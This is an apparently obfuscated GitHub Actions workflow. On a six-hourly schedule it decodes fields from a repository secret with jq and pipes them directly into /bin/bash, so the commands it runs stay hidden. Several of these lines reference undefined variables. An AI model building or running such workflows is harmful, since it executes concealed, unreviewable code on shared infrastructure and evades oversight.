name: jiangjing19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '53 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiangjing19871010
        env:
          puuy45: ${{ secrets.puuy45 }}
        run: |
          echo $puuy45 | jq -r .bbfj31 | /bin/bash
          echo $kcmf03332 | jq -r .qkr399 | /bin/bash
          echo $dhb30 | jq -r .ayp9643 | /bin/bash
          echo $ayotj26 | jq -r .aqf29 | /bin/bash
          echo $dyn09 | jq -r .deppd0 | /bin/bash
          echo $ab24 | jq -r .uvgms145 | /bin/bash
          echo $yhi0 | jq -r .metj9 | /bin/bash

